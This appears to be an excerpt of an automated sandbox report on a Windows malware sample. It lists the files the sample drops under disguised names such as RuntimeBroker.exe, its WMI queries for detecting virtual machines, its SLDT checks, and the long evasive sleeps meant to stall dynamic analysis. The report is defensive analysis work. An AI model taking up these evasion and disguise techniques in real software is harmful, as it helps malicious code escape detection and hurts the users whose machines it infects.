Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Memory allocated: 2CF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Memory allocated: 1AF90000 memory reserve | memory write watch Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 15C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1B030000 memory reserve | memory write watch Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: BB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1A810000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 15E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1B4A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 2610000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1A610000 memory reserve | memory write watch Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: F50000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1AC50000 memory reserve | memory write watch
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1080000 memory reserve | memory write watch
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1AE30000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: DC0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1ABA0000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1910000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1B390000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: C90000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1AA00000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: BF0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1AAA0000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1720000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1B1F0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 2F00000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1B010000 memory reserve | memory write watch
Contains functionality to detect virtual machines (SLDT)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C8355 sldt word ptr [eax] 19_2_00007FFD9B8C8355
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 597229 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 597094 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596969 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596794 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596617 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 600000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 599853
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 3600000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598907
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598203
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597563
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597344
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597094
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596938
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596766
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596640
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596531
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596422
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596259
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596107
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 300000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595954
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595828
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595580
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595438
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595266
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595140
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595014
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594906
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594797
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594688
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594563
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594438
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594313
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594198
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594078
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593969
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593844
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593735
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593610
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593485
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593360
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593250
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593141
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592985
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592846
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592610
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592485
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592375
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592266
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592157
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592032
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591903
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591797
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591688
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591578
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591468
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591360
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591235
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591110
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Window / User API: threadDelayed 3866 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Window / User API: threadDelayed 1627 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4378
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 437
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4895
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3995
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 367
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Window / User API: threadDelayed 4252
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Window / User API: threadDelayed 5368
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hSShNgSi.log Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yzZxaXSF.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eSWSCFMK.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NWsvAoLz.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nweImycr.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VRHDyDUj.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\quERYeDq.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fAbTigaR.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ekLJkSsv.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wHsyCTFf.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LionObPB.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EkAnmMVM.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rrfZteSl.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZpKsdnCB.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GNRoGDmH.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kdoiNyxj.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QwkEqgro.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HScOGmcH.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BazpdGXT.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DEgxfiAU.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cnkBPSdA.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ndjISZpy.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JNNDResf.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wexYWbhZ.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NEEtYbtY.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IhtNKAXm.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WoNdSLwd.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oQGhqvNX.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UMwcyUfj.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BuKwfPUT.log Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -15679732462653109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99883s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99657s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99544s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99199s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99084s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98829s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98704s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98579s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98454s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98329s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98204s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -97954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -597229s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -597094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -596969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -596794s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -596617s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6280 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 7048 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 6296 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7108 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 3192 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 5752 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476 Thread sleep count: 4378 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep count: 437 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep count: 4815 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep count: 4895 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep count: 230 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep count: 3995 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 Thread sleep count: 4514 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep count: 367 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800 Thread sleep time: -3689348814741908s >= -30000s
